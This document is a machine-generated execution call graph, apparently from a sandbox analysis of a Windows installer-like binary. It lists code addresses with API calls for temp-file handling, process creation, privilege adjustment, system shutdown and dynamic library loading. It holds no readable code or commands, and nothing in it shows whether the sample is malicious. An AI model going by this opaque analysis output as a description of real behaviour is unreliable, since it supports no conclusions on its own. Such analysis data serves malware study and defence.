                                                            execution_graph 5220 4047c0 5222 4048f2 5220->5222 5224 4047d8 5220->5224 5221 40495c 5223 404a26 5221->5223 5225 404966 GetDlgItem 5221->5225 5222->5221 5222->5223 5229 40492d GetDlgItem SendMessageW 5222->5229 5263 404668 5223->5263 5251 404601 5224->5251 5227 404980 5225->5227 5228 4049e7 5225->5228 5227->5228 5233 4049a6 SendMessageW LoadCursorW SetCursor 5227->5233 5228->5223 5234 4049f9 5228->5234 5256 404623 EnableWindow 5229->5256 5230 40483f 5236 404601 22 API calls 5230->5236 5232 404a21 5260 404a6f 5233->5260 5238 404a0f 5234->5238 5239 4049ff SendMessageW 5234->5239 5241 40484c CheckDlgButton 5236->5241 5238->5232 5243 404a15 SendMessageW 5238->5243 5239->5238 5240 404957 5257 404a4b 5240->5257 5254 404623 EnableWindow 5241->5254 5243->5232 5246 40486a GetDlgItem 5255 404636 SendMessageW 5246->5255 5248 404880 SendMessageW 5249 4048a6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5248->5249 5250 40489d GetSysColor 5248->5250 5249->5232 5250->5249 5252 4066bf 21 API calls 5251->5252 5253 40460c SetDlgItemTextW 5252->5253 5253->5230 5254->5246 5255->5248 5256->5240 5258 404a59 5257->5258 5259 404a5e SendMessageW 5257->5259 5258->5259 5259->5221 5277 405ca8 ShellExecuteExW 5260->5277 5262 4049d5 LoadCursorW SetCursor 5262->5228 5264 40472b 5263->5264 5265 404680 GetWindowLongW 5263->5265 5264->5232 5265->5264 5266 404695 5265->5266 5266->5264 5267 4046c2 GetSysColor 5266->5267 5268 4046c5 5266->5268 5267->5268 5269 4046d5 SetBkMode 5268->5269 5270 4046cb SetTextColor 5268->5270 5271 4046f3 5269->5271 5272 4046ed GetSysColor 5269->5272 5270->5269 5273 404704 5271->5273 5274 4046fa SetBkColor 5271->5274 5272->5271 5273->5264 5275 404717 DeleteObject 5273->5275 5276 40471e CreateBrushIndirect 5273->5276 5274->5273 5275->5276 5276->5264 5277->5262 5278 402643 5279 402672 5278->5279 5280 402657 5278->5280 5282 4026a2 5279->5282 5283 402677 5279->5283 5281 402d89 21 API calls 5280->5281 5291 40265e 5281->5291 5285 402dab 21 API calls 5282->5285 5284 402dab 21 API calls 5283->5284 5287 40267e 5284->5287 5286 4026a9 lstrlenW 5285->5286 5286->5291 5295 4066a4 WideCharToMultiByte 5287->5295 5289 402692 lstrlenA 5289->5291 5290 4026ec 5291->5290 5293 406253 5 API calls 5291->5293 5294 4026d6 5291->5294 5292 406224 WriteFile 5292->5290 5293->5294 5294->5290 5294->5292 5295->5289 4349 403645 SetErrorMode GetVersionExW 4350 4036d1 4349->4350 4351 403699 GetVersionExW 4349->4351 4352 403728 4350->4352 4353 406a76 5 API calls 4350->4353 4351->4350 4354 406a06 3 API calls 4352->4354 4353->4352 4355 40373e lstrlenA 4354->4355 4355->4352 4356 40374e 4355->4356 4357 406a76 5 API calls 4356->4357 4358 403755 4357->4358 4359 406a76 5 API calls 4358->4359 4360 40375c 4359->4360 4361 406a76 5 API calls 4360->4361 4362 403768 #17 OleInitialize SHGetFileInfoW 4361->4362 4437 406682 lstrcpynW 4362->4437 4365 4037b7 GetCommandLineW 4438 406682 lstrcpynW 4365->4438 4367 4037c9 4368 405f7e CharNextW 4367->4368 4369 4037ef CharNextW 4368->4369 4379 403801 4369->4379 4370 403903 4371 403917 GetTempPathW 4370->4371 4439 403614 4371->4439 4373 40392f 4375 403933 GetWindowsDirectoryW lstrcatW 4373->4375 4376 403989 DeleteFileW 4373->4376 4374 405f7e CharNextW 4374->4379 4377 403614 12 API calls 4375->4377 4449 4030d5 GetTickCount GetModuleFileNameW 4376->4449 4380 40394f 4377->4380 4379->4370 4379->4374 4383 403905 4379->4383 4380->4376 4382 403953 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4380->4382 4381 40399d 4389 405f7e CharNextW 4381->4389 4420 403a44 4381->4420 4428 403a54 4381->4428 4384 403614 12 API calls 4382->4384 4536 406682 lstrcpynW 4383->4536 4387 403981 4384->4387 4387->4376 4387->4428 4393 4039bc 4389->4393 4391 403ba2 4394 405ce2 MessageBoxIndirectW 4391->4394 4392 403bc6 4395 403c4a ExitProcess 4392->4395 4396 403bce GetCurrentProcess OpenProcessToken 4392->4396 4397 403a1a 4393->4397 4398 403a5d 4393->4398 4400 403bb0 ExitProcess 4394->4400 4401 403be6 LookupPrivilegeValueW AdjustTokenPrivileges 4396->4401 4402 403c1a 4396->4402 4537 406059 4397->4537 4553 405c4d 4398->4553 4401->4402 4403 406a76 5 API calls 4402->4403 4406 403c21 4403->4406 4410 403c36 ExitWindowsEx 4406->4410 4412 403c43 4406->4412 4410->4395 4410->4412 4411 403a7c 4414 403a94 4411->4414 4557 406682 lstrcpynW 4411->4557 4622 40140b 4412->4622 4419 403aba wsprintfW 4414->4419 4434 403ae6 4414->4434 4416 403a39 4552 406682 lstrcpynW 4416->4552 4421 4066bf 21 API calls 4419->4421 4479 403d54 4420->4479 4421->4414 4424 403b30 SetCurrentDirectoryW 4603 406442 MoveFileExW 4424->4603 4425 403af6 GetFileAttributesW 4426 403b02 DeleteFileW 4425->4426 4425->4434 4426->4434 4613 403c62 4428->4613 4431 406442 40 API calls 4431->4434 4432 4066bf 21 API calls 4432->4434 4434->4414 4434->4419 4434->4424 4434->4425 4434->4428 4434->4431 4434->4432 4435 403bb8 CloseHandle 4434->4435 4558 405bd6 CreateDirectoryW 4434->4558 4561 405c30 CreateDirectoryW 4434->4561 4564 405d8e 4434->4564 4607 405c65 CreateProcessW 4434->4607 4610 4069df FindFirstFileW 4434->4610 4435->4428 4437->4365 4438->4367 4440 406930 5 API calls 4439->4440 4442 403620 4440->4442 4441 40362a 4441->4373 4442->4441 4625 405f51 lstrlenW CharPrevW 4442->4625 4445 405c30 2 API calls 4446 403638 4445->4446 4447 4061a1 2 API calls 4446->4447 4448 403643 4447->4448 4448->4373 4628 406172 GetFileAttributesW CreateFileW 4449->4628 4451 403118 4478 403125 4451->4478 4629 406682 lstrcpynW 4451->4629 4453 40313b 4630 405f9d lstrlenW 4453->4630 4457 40314c GetFileSize 4472 403246 4457->4472 4477 403163 4457->4477 4461 40328b GlobalAlloc 4464 4032a2 4461->4464 4463 4032e3 4465 403033 36 API calls 4463->4465 4468 4061a1 2 API calls 4464->4468 4465->4478 4466 40326c 4467 4035e7 ReadFile 4466->4467 4469 403277 4467->4469 4471 4032b3 CreateFileW 4468->4471 4469->4461 4469->4478 4470 403033 36 API calls 4470->4477 4473 4032ed 4471->4473 4471->4478 4635 403033 4472->4635 4650 4035fd SetFilePointer 4473->4650 4475 4032fb 4651 403376 4475->4651 4477->4463 4477->4470 4477->4472 4477->4478 4666 4035e7 4477->4666 4478->4381 4480 406a76 5 API calls 4479->4480 4481 403d68 4480->4481 4482 403d80 4481->4482 4485 403d6e 4481->4485 4483 406550 3 API calls 4482->4483 4484 403db0 4483->4484 4486 403dcf lstrcatW 4484->4486 4488 406550 3 API calls 4484->4488 4721 4065c9 wsprintfW 4485->4721 4489 403d7e 4486->4489 4488->4486 4713 40402a 4489->4713 4492 406059 18 API calls 4493 403e01 4492->4493 4494 403e95 4493->4494 4496 406550 3 API calls 4493->4496 4495 406059 18 API calls 4494->4495 4497 403e9b 4495->4497 4498 403e33 4496->4498 4499 403eab LoadImageW 4497->4499 4500 4066bf 21 API calls 4497->4500 4498->4494 4506 403e54 lstrlenW 4498->4506 4507 405f7e CharNextW 4498->4507 4501 403f51 4499->4501 4502 403ed2 RegisterClassW 4499->4502 4500->4499 4505 40140b 2 API calls 4501->4505 4503 403f5b 4502->4503 4504 403f08 SystemParametersInfoW CreateWindowExW 4502->4504 4503->4428 4504->4501 4510 403f57 4505->4510 4508 403e62 lstrcmpiW 4506->4508 4509 403e88 4506->4509 4511 403e51 4507->4511 4508->4509 4512 403e72 GetFileAttributesW 4508->4512 4513 405f51 3 API calls 4509->4513 4510->4503 4515 40402a 22 API calls 4510->4515 4511->4506 4514 403e7e 4512->4514 4516 403e8e 4513->4516 4514->4509 4517 405f9d 2 API calls 4514->4517 4518 403f68 4515->4518 4722 406682 lstrcpynW 4516->4722 4517->4509 4520 403f74 ShowWindow 4518->4520 4521 403ff7 4518->4521 4523 406a06 3 API calls 4520->4523 4723 4057da OleInitialize 4521->4723 4525 403f8c 4523->4525 4524 403ffd 4526 404001 4524->4526 4527 404019 4524->4527 4528 403f9a GetClassInfoW 4525->4528 4532 406a06 3 API calls 4525->4532 4526->4503 4534 40140b 2 API calls 4526->4534 4531 40140b 2 API calls 4527->4531 4529 403fc4 DialogBoxParamW 4528->4529 4530 403fae GetClassInfoW RegisterClassW 4528->4530 4533 40140b 2 API calls 4529->4533 4530->4529 4531->4503 4532->4528 4535 403fec 4533->4535 4534->4503 4535->4503 4536->4371 4741 406682 lstrcpynW 4537->4741 4539 40606a 4742 405ffc CharNextW CharNextW 4539->4742 4542 403a26 4542->4428 4551 406682 lstrcpynW 4542->4551 4543 406930 5 API calls 4549 406080 4543->4549 4544 4060b1 lstrlenW 4545 4060bc 4544->4545 4544->4549 4547 405f51 3 API calls 4545->4547 4546 4069df 2 API calls 4546->4549 4548 4060c1 GetFileAttributesW 4547->4548 4548->4542 4549->4542 4549->4544 4549->4546 4550 405f9d 2 API calls 4549->4550 4550->4544 4551->4416 4552->4420 4554 406a76 5 API calls 4553->4554 4555 403a62 lstrlenW 4554->4555 4556 406682 lstrcpynW 4555->4556 4556->4411 4557->4414 4559 405c22 4558->4559 4560 405c26 GetLastError 4558->4560 4559->4434 4560->4559 4562 405c40 4561->4562 4563 405c44 GetLastError 4561->4563 4562->4434 4563->4562 4565 406059 18 API calls 4564->4565 4566 405dae 4565->4566 4567 405db6 DeleteFileW 4566->4567 4568 405dcd 4566->4568 4569 405f04 4567->4569 4570 405ef8 4568->4570 4748 406682 lstrcpynW 4568->4748 4569->4434 4570->4569 4575 4069df 2 API calls 4570->4575 4572 405df3 4573 405e06 4572->4573 4574 405df9 lstrcatW 4572->4574 4577 405f9d 2 API calls 4573->4577 4576 405e0c 4574->4576 4578 405f12 4575->4578 4579 405e1c lstrcatW 4576->4579 4580 405e27 lstrlenW FindFirstFileW 4576->4580 4577->4576 4578->4569 4581 405f16 4578->4581 4579->4580 4582 405eed 4580->4582 4584 405e49 4580->4584 4583 405f51 3 API calls 4581->4583 4582->4570 4585 405f1c 4583->4585 4586 405ed0 FindNextFileW 4584->4586 4596 405d8e 64 API calls 4584->4596 4598 405707 28 API calls 4584->4598 4600 405707 28 API calls 4584->4600 4602 406442 40 API calls 4584->4602 4749 406682 lstrcpynW 4584->4749 4750 405d46 4584->4750 4587 405d46 5 API calls 4585->4587 4586->4584 4590 405ee6 FindClose 4586->4590 4589 405f28 4587->4589 4591 405f42 4589->4591 4592 405f2c 4589->4592 4590->4582 4594 405707 28 API calls 4591->4594 4592->4569 4595 405707 28 API calls 4592->4595 4594->4569 4597 405f39 4595->4597 4596->4584 4599 406442 40 API calls 4597->4599 4598->4586 4601 405f40 4599->4601 4600->4584 4601->4569 4602->4584 4604 403b3f CopyFileW 4603->4604 4605 406456 4603->4605 4604->4428 4604->4434 4761 4062c8 4605->4761 4608 405ca4 4607->4608 4609 405c98 CloseHandle 4607->4609 4608->4434 4609->4608 4611 406a00 4610->4611 4612 4069f5 FindClose 4610->4612 4611->4434 4612->4611 4614 403c73 CloseHandle 4613->4614 4615 403c7d 4613->4615 4614->4615 4616 403c91 4615->4616 4617 403c87 CloseHandle 4615->4617 4795 403cbf 4616->4795 4617->4616 4620 405d8e 71 API calls 4621 403b95 OleUninitialize 4620->4621 4621->4391 4621->4392 4623 401389 2 API calls 4622->4623 4624 401420 4623->4624 4624->4395 4626 403632 4625->4626 4627 405f6d lstrcatW 4625->4627 4626->4445 4627->4626 4628->4451 4629->4453 4631 405fab 4630->4631 4632 405fb1 CharPrevW 4631->4632 4633 403141 4631->4633 4632->4631 4632->4633 4634 406682 lstrcpynW 4633->4634 4634->4457 4636 403044 4635->4636 4637 40305c 4635->4637 4638 40304d DestroyWindow 4636->4638 4641 403054 4636->4641 4639 403064 4637->4639 4640 40306c GetTickCount 4637->4640 4638->4641 4670 406ab2 4639->4670 4640->4641 4642 40307a 4640->4642 4641->4461 4641->4478 4669 4035fd SetFilePointer 4641->4669 4644 403082 4642->4644 4645 4030af CreateDialogParamW ShowWindow 4642->4645 4644->4641 4674 403017 4644->4674 4645->4641 4647 403090 wsprintfW 4677 405707 4647->4677 4650->4475 4652 4033a1 4651->4652 4653 403385 SetFilePointer 4651->4653 4688 40347e GetTickCount 4652->4688 4653->4652 4656 40343e 4656->4478 4659 40347e 46 API calls 4660 4033d8 4659->4660 4660->4656 4661 403444 ReadFile 4660->4661 4663 4033e7 4660->4663 4661->4656 4663->4656 4664 4061f5 ReadFile 4663->4664 4703 406224 WriteFile 4663->4703 4664->4663 4667 4061f5 ReadFile 4666->4667 4668 4035fa 4667->4668 4668->4477 4669->4466 4671 406acf PeekMessageW 4670->4671 4672 406ac5 DispatchMessageW 4671->4672 4673 406adf 4671->4673 4672->4671 4673->4641 4675 403026 4674->4675 4676 403028 MulDiv 4674->4676 4675->4676 4676->4647 4678 405722 4677->4678 4687 4030ad 4677->4687 4679 40573e lstrlenW 4678->4679 4680 4066bf 21 API calls 4678->4680 4681 405767 4679->4681 4682 40574c lstrlenW 4679->4682 4680->4679 4684 40577a 4681->4684 4685 40576d SetWindowTextW 4681->4685 4683 40575e lstrcatW 4682->4683 4682->4687 4683->4681 4686 405780 SendMessageW SendMessageW SendMessageW 4684->4686 4684->4687 4685->4684 4686->4687 4687->4641 4689 4035d6 4688->4689 4690 4034ac 4688->4690 4691 403033 36 API calls 4689->4691 4705 4035fd SetFilePointer 4690->4705 4697 4033a8 4691->4697 4693 4034b7 SetFilePointer 4699 4034dc 4693->4699 4694 4035e7 ReadFile 4694->4699 4696 403033 36 API calls 4696->4699 4697->4656 4701 4061f5 ReadFile 4697->4701 4698 406224 WriteFile 4698->4699 4699->4694 4699->4696 4699->4697 4699->4698 4700 4035b7 SetFilePointer 4699->4700 4706 406bf1 4699->4706 4700->4689 4702 4033c1 4701->4702 4702->4656 4702->4659 4704 406242 4703->4704 4704->4663 4705->4693 4707 406c16 4706->4707 4708 406c1e 4706->4708 4707->4699 4708->4707 4709 406ca5 GlobalFree 4708->4709 4710 406cae GlobalAlloc 4708->4710 4711 406d25 GlobalAlloc 4708->4711 4712 406d1c GlobalFree 4708->4712 4709->4710 4710->4707 4710->4708 4711->4707 4711->4708 4712->4711 4714 40403e 4713->4714 4730 4065c9 wsprintfW 4714->4730 4716 4040af 4731 4040e3 4716->4731 4718 403ddf 4718->4492 4719 4040b4 4719->4718 4720 4066bf 21 API calls 4719->4720 4720->4719 4721->4489 4722->4494 4734 40464d 4723->4734 4725 40464d SendMessageW 4727 405836 OleUninitialize 4725->4727 4726 4057fd 4729 405824 4726->4729 4737 401389 4726->4737 4727->4524 4729->4725 4730->4716 4732 4066bf 21 API calls 4731->4732 4733 4040f1 SetWindowTextW 4732->4733 4733->4719 4735 404665 4734->4735 4736 404656 SendMessageW 4734->4736 4735->4726 4736->4735 4739 401390 4737->4739 4738 4013fe 4738->4726 4739->4738 4740 4013cb MulDiv SendMessageW 4739->4740 4740->4739 4741->4539 4743 406019 4742->4743 4745 40602b 4742->4745 4744 406026 CharNextW 4743->4744 4743->4745 4747 40604f 4744->4747 4746 405f7e CharNextW 4745->4746 4745->4747 4746->4745 4747->4542 4747->4543 4748->4572 4749->4584 4758 40614d GetFileAttributesW 4750->4758 4753 405d73 4753->4584 4754 405d61 RemoveDirectoryW 4756 405d6f 4754->4756 4755 405d69 DeleteFileW 4755->4756 4756->4753 4757 405d7f SetFileAttributesW 4756->4757 4757->4753 4759 405d52 4758->4759 4760 40615f SetFileAttributesW 4758->4760 4759->4753 4759->4754 4759->4755 4760->4759 4762 4062f8 4761->4762 4763 40631e GetShortPathNameW 4761->4763 4788 406172 GetFileAttributesW CreateFileW 4762->4788 4765 406333 4763->4765 4766 40643d 4763->4766 4765->4766 4768 40633b wsprintfA 4765->4768 4766->4604 4767 406302 CloseHandle GetShortPathNameW 4767->4766 4769 406316 4767->4769 4770 4066bf 21 API calls 4768->4770 4769->4763 4769->4766 4771 406363 4770->4771 4789 406172 GetFileAttributesW CreateFileW 4771->4789 4773 406370 4773->4766 4774 40637f GetFileSize GlobalAlloc 4773->4774 4775 4063a1 4774->4775 4776 406436 CloseHandle 4774->4776 4777 4061f5 ReadFile 4775->4777 4776->4766 4778 4063a9 4777->4778 4778->4776 4790 4060d7 lstrlenA 4778->4790 4781 4063c0 lstrcpyA 4786 4063e2 4781->4786 4782 4063d4 4783 4060d7 4 API calls 4782->4783 4783->4786 4784 406419 SetFilePointer 4785 406224 WriteFile 4784->4785 4787 40642f GlobalFree 4785->4787 4786->4784 4787->4776 4788->4767 4789->4773 4791 406118 lstrlenA 4790->4791 4792 4060f1 lstrcmpiA 4791->4792 4794 406120 4791->4794 4793 40610f CharNextA 4792->4793 4792->4794 4793->4791 4794->4781 4794->4782 4796 403ccd 4795->4796 4797 403c96 4796->4797 4798 403cd2 FreeLibrary GlobalFree 4796->4798 4797->4620 4798->4797 4798->4798 4805 4015c6 4806 402dab 21 API calls 4805->4806 4807 4015cd 4806->4807 4808 405ffc 4 API calls 4807->4808 4821 4015d6 4808->4821 4809 401636 4811 401668 4809->4811 4812 40163b 4809->4812 4810 405f7e CharNextW 4810->4821 4815 401423 28 API calls 4811->4815 4824 401423 4812->4824 4820 401660 4815->4820 4817 405c30 2 API calls 4817->4821 4818 405c4d 5 API calls 4818->4821 4819 40164f SetCurrentDirectoryW 4819->4820 4821->4809 4821->4810 4821->4817 4821->4818 4822 40161c GetFileAttributesW 4821->4822 4823 405bd6 2 API calls 4821->4823 4822->4821 4823->4821 4825 405707 28 API calls 4824->4825 4826 401431 4825->4826 4827 406682 lstrcpynW 4826->4827 4827->4819 5296 405846 5297 4059f0 5296->5297 5298 405867 GetDlgItem GetDlgItem GetDlgItem 5296->5298 5300 405a21 5297->5300 5301 4059f9 GetDlgItem CreateThread CloseHandle 5297->5301 5341 404636 SendMessageW 5298->5341 5303 405a71 5300->5303 5304 405a38 ShowWindow ShowWindow 5300->5304 5305 405a4c 5300->5305 5301->5300 5302 4058d7 5307 4058de GetClientRect GetSystemMetrics SendMessageW SendMessageW 5302->5307 5311 404668 8 API calls 5303->5311 5343 404636 SendMessageW 5304->5343 5306 405aac 5305->5306 5309 405a60 5305->5309 5310 405a86 ShowWindow 5305->5310 5306->5303 5314 405aba SendMessageW 5306->5314 5312 405930 SendMessageW SendMessageW 5307->5312 5313 40594c 5307->5313 5344 4045da 5309->5344 5317 405aa6 5310->5317 5318 405a98 5310->5318 5316 405a7f 5311->5316 5312->5313 5319 405951 SendMessageW 5313->5319 5320 40595f 5313->5320 5314->5316 5321 405ad3 CreatePopupMenu 5314->5321 5323 4045da SendMessageW 5317->5323 5322 405707 28 API calls 5318->5322 5319->5320 5325 404601 22 API calls 5320->5325 5324 4066bf 21 API calls 5321->5324 5322->5317 5323->5306 5326 405ae3 AppendMenuW 5324->5326 5327 40596f 5325->5327 5328 405b00 GetWindowRect 5326->5328 5329 405b13 TrackPopupMenu 5326->5329 5330 405978 ShowWindow 5327->5330 5331 4059ac GetDlgItem SendMessageW 5327->5331 5328->5329 5329->5316 5332 405b2e 5329->5332 5333 40599b 5330->5333 5334 40598e ShowWindow 5330->5334 5331->5316 5335 4059d3 SendMessageW SendMessageW 5331->5335 5336 405b4a SendMessageW 5332->5336 5342 404636 SendMessageW 5333->5342 5334->5333 5335->5316 5336->5336 5337 405b67 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5336->5337 5339 405b8c SendMessageW 5337->5339 5339->5339 5340 405bb5 GlobalUnlock SetClipboardData CloseClipboard 5339->5340 5340->5316 5341->5302 5342->5331 5343->5305 5345 4045e1 5344->5345 5346 4045e7 SendMessageW 5344->5346 5345->5346 5346->5303 4828 401c48 4829 402d89 21 API calls 4828->4829 4830 401c4f 4829->4830 4831 402d89 21 API calls 4830->4831 4832 401c5c 4831->4832 4833 401c71 4832->4833 4834 402dab 21 API calls 4832->4834 4835 401c81 4833->4835 4836 402dab 21 API calls 4833->4836 4834->4833 4837 401cd8 4835->4837 4838 401c8c 4835->4838 4836->4835 4839 402dab 21 API calls 4837->4839 4840 402d89 21 API calls 4838->4840 4841 401cdd 4839->4841 4842 401c91 4840->4842 4843 402dab 21 API calls 4841->4843 4844 402d89 21 API calls 4842->4844 4845 401ce6 FindWindowExW 4843->4845 4846 401c9d 4844->4846 4849 401d08 4845->4849 4847 401cc8 SendMessageW 4846->4847 4848 401caa SendMessageTimeoutW 4846->4848 4847->4849 4848->4849 5347 404e48 5348 404e74 5347->5348 5349 404e58 5347->5349 5350 404ea7 5348->5350 5351 404e7a SHGetPathFromIDListW 5348->5351 5358 405cc6 GetDlgItemTextW 5349->5358 5354 404e91 SendMessageW 5351->5354 5355 404e8a 5351->5355 5353 404e65 SendMessageW 5353->5348 5354->5350 5356 40140b 2 API calls 5355->5356 5356->5354 5358->5353 5359 4028c9 5360 4028cf 5359->5360 5361 4028d7 FindClose 5360->5361 5362 402c2f 5360->5362 5361->5362 5366 6e31103d 5369 6e31101b 5366->5369 5376 6e3115b6 5369->5376 5371 6e311020 5372 6e311024 5371->5372 5373 6e311027 GlobalAlloc 5371->5373 5374 6e3115dd 3 API calls 5372->5374 5373->5372 5375 6e31103b 5374->5375 5378 6e3115bc 5376->5378 5377 6e3115c2 5377->5371 5378->5377 5379 6e3115ce GlobalFree 5378->5379 5379->5371 5380 4016d1 5381 402dab 21 API calls 5380->5381 5382 4016d7 GetFullPathNameW 5381->5382 5383 4016f1 5382->5383 5389 401713 5382->5389 5386 4069df 2 API calls 5383->5386 5383->5389 5384 401728 GetShortPathNameW 5385 402c2f 5384->5385 5387 401703 5386->5387 5387->5389 5390 406682 lstrcpynW 5387->5390 5389->5384 5389->5385 5390->5389 5391 401e53 GetDC 5392 402d89 21 API calls 5391->5392 5393 401e65 GetDeviceCaps MulDiv ReleaseDC 5392->5393 5394 402d89 21 API calls 5393->5394 5395 401e96 5394->5395 5396 4066bf 21 API calls 5395->5396 5397 401ed3 CreateFontIndirectW 5396->5397 5398 40263d 5397->5398 5399 402955 5400 402dab 21 API calls 5399->5400 5401 402961 5400->5401 5402 402977 5401->5402 5403 402dab 21 API calls 5401->5403 5404 40614d 2 API calls 5402->5404 5403->5402 5405 40297d 5404->5405 5427 406172 GetFileAttributesW CreateFileW 5405->5427 5407 40298a 5408 402a40 5407->5408 5411 4029a5 GlobalAlloc 5407->5411 5412 402a28 5407->5412 5409 402a47 DeleteFileW 5408->5409 5410 402a5a 5408->5410 5409->5410 5411->5412 5413 4029be 5411->5413 5414 403376 48 API calls 5412->5414 5428 4035fd SetFilePointer 5413->5428 5416 402a35 CloseHandle 5414->5416 5416->5408 5417 4029c4 5418 4035e7 ReadFile 5417->5418 5419 4029cd GlobalAlloc 5418->5419 5420 402a11 5419->5420 5421 4029dd 5419->5421 5423 406224 WriteFile 5420->5423 5422 403376 48 API calls 5421->5422 5426 4029ea 5422->5426 5424 402a1d GlobalFree 5423->5424 5424->5412 5425 402a08 GlobalFree 5425->5420 5426->5425 5427->5407 5428->5417 5443 4014d7 5444 402d89 21 API calls 5443->5444 5445 4014dd Sleep 5444->5445 5447 402c2f 5445->5447 5448 40195b 5449 402dab 21 API calls 5448->5449 5450 401962 lstrlenW 5449->5450 5451 40263d 5450->5451 5026 4020dd 5027 4021a1 5026->5027 5028 4020ef 5026->5028 5031 401423 28 API calls 5027->5031 5029 402dab 21 API calls 5028->5029 5030 4020f6 5029->5030 5032 402dab 21 API calls 5030->5032 5036 4022fb 5031->5036 5033 4020ff 5032->5033 5034 402115 LoadLibraryExW 5033->5034 5035 402107 GetModuleHandleW 5033->5035 5034->5027 5037 402126 5034->5037 5035->5034 5035->5037 5049 406ae5 5037->5049 5040 402170 5042 405707 28 API calls 5040->5042 5041 402137 5043 402156 5041->5043 5044 40213f 5041->5044 5045 402147 5042->5045 5054 6e311817 5043->5054 5046 401423 28 API calls 5044->5046 5045->5036 5047 402193 FreeLibrary 5045->5047 5046->5045 5047->5036 5096 4066a4 WideCharToMultiByte 5049->5096 5051 406b02 5052 406b09 GetProcAddress 5051->5052 5053 402131 5051->5053 5052->5053 5053->5040 5053->5041 5055 6e31184a 5054->5055 5097 6e311bff 5055->5097 5057 6e311851 5058 6e311976 5057->5058 5059 6e311862 5057->5059 5060 6e311869 5057->5060 5058->5045 5147 6e31243e 5059->5147 5131 6e312480 5060->5131 5065 6e31188e 5066 6e3118cd 5065->5066 5067 6e3118af 5065->5067 5070 6e3118d3 5066->5070 5071 6e31191e 5066->5071 5160 6e312655 5067->5160 5068 6e311898 5068->5065 5157 6e312e23 5068->5157 5069 6e31187f 5073 6e311885 5069->5073 5078 6e311890 5069->5078 5179 6e311666 5070->5179 5076 6e312655 10 API calls 5071->5076 5073->5065 5141 6e312b98 5073->5141 5082 6e31190f 5076->5082 5077 6e3118b5 5171 6e311654 5077->5171 5151 6e312810 5078->5151 5087 6e311965 5082->5087 5185 6e312618 5082->5185 5084 6e311896 5084->5065 5085 6e312655 10 API calls 5085->5082 5087->5058 5090 6e31196f GlobalFree 5087->5090 5090->5058 5093 6e311951 5093->5087 5189 6e3115dd wsprintfW 5093->5189 5094 6e31194a FreeLibrary 5094->5093 5096->5051 5192 6e3112bb GlobalAlloc 5097->5192 5099 6e311c26 5193 6e3112bb GlobalAlloc 5099->5193 5101 6e311e6b GlobalFree GlobalFree GlobalFree 5102 6e311e88 5101->5102 5115 6e311ed2 5101->5115 5104 6e31227e 5102->5104 5112 6e311e9d 5102->5112 5102->5115 5103 6e311d26 GlobalAlloc 5118 6e311c31 5103->5118 5105 6e3122a0 GetModuleHandleW 5104->5105 5104->5115 5108 6e3122b1 LoadLibraryW 5105->5108 5109 6e3122c6 5105->5109 5106 6e311d71 lstrcpyW 5111 6e311d7b lstrcpyW 5106->5111 5107 6e311d8f GlobalFree 5107->5118 5108->5109 5108->5115 5200 6e3116bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5109->5200 5111->5118 5112->5115 5196 6e3112cc 5112->5196 5113 6e312318 5113->5115 5117 6e312325 lstrlenW 5113->5117 5114 6e312126 5199 6e3112bb GlobalAlloc 5114->5199 5115->5057 5201 6e3116bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5117->5201 5118->5101 5118->5103 5118->5106 5118->5107 5118->5111 5118->5114 5118->5115 5120 6e312067 GlobalFree 5118->5120 5121 6e3121ae 5118->5121 5124 6e311dcd 5118->5124 5126 6e3112cc 2 API calls 5118->5126 5120->5118 5121->5115 5128 6e312216 lstrcpyW 5121->5128 5122 6e3122d8 5122->5113 5129 6e312302 GetProcAddress 5122->5129 5124->5118 5194 6e31162f GlobalSize GlobalAlloc 5124->5194 5125 6e31233f 5125->5115 5126->5118 5128->5115 5129->5113 5130 6e31212f 5130->5057 5138 6e312498 5131->5138 5132 6e3112cc GlobalAlloc lstrcpynW 5132->5138 5134 6e3125c1 GlobalFree 5137 6e31186f 5134->5137 5134->5138 5135 6e312540 GlobalAlloc WideCharToMultiByte 5135->5134 5136 6e31256b GlobalAlloc CLSIDFromString 5136->5134 5137->5065 5137->5068 5137->5069 5138->5132 5138->5134 5138->5135 5138->5136 5140 6e31258a 5138->5140 5203 6e31135a 5138->5203 5140->5134 5207 6e3127a4 5140->5207 5143 6e312baa 5141->5143 5142 6e312c4f CloseHandle 5146 6e312c6d 5142->5146 5143->5142 5145 6e312d39 5145->5065 5210 6e312b42 5146->5210 5148 6e312453 5147->5148 5149 6e311868 5148->5149 5150 6e31245e GlobalAlloc 5148->5150 5149->5060 5150->5148 5155 6e312840 5151->5155 5152 6e3128db GlobalAlloc 5156 6e3128fe 5152->5156 5153 6e3128ee 5154 6e3128f4 GlobalSize 5153->5154 5153->5156 5154->5156 5155->5152 5155->5153 5156->5084 5158 6e312e2e 5157->5158 5159 6e312e6e GlobalFree 5158->5159 5214 6e3112bb GlobalAlloc 5160->5214 5162 6e3126d8 MultiByteToWideChar 5168 6e31265f 5162->5168 5163 6e31270b lstrcpynW 5163->5168 5164 6e3126fa StringFromGUID2 5164->5168 5165 6e31271e wsprintfW 5165->5168 5166 6e312742 GlobalFree 5166->5168 5167 6e312777 GlobalFree 5167->5077 5168->5162 5168->5163 5168->5164 5168->5165 5168->5166 5168->5167 5169 6e311312 2 API calls 5168->5169 5215 6e311381 5168->5215 5169->5168 5219 6e3112bb GlobalAlloc 5171->5219 5173 6e311659 5174 6e311666 2 API calls 5173->5174 5175 6e311663 5174->5175 5176 6e311312 5175->5176 5177 6e311355 GlobalFree 5176->5177 5178 6e31131b GlobalAlloc lstrcpynW 5176->5178 5177->5082 5178->5177 5180 6e311672 wsprintfW 5179->5180 5181 6e31169f lstrcpyW 5179->5181 5184 6e3116b8 5180->5184 5181->5184 5184->5085 5186 6e312626 5185->5186 5188 6e311931 5185->5188 5187 6e312642 GlobalFree 5186->5187 5186->5188 5187->5186 5188->5093 5188->5094 5190 6e311312 2 API calls 5189->5190 5191 6e3115fe 5190->5191 5191->5087 5192->5099 5193->5118 5195 6e31164d 5194->5195 5195->5124 5202 6e3112bb GlobalAlloc 5196->5202 5198 6e3112db lstrcpynW 5198->5115 5199->5130 5200->5122 5201->5125 5202->5198 5204 6e311361 5203->5204 5205 6e3112cc 2 API calls 5204->5205 5206 6e31137f 5205->5206 5206->5138 5208 6e3127b2 VirtualAlloc 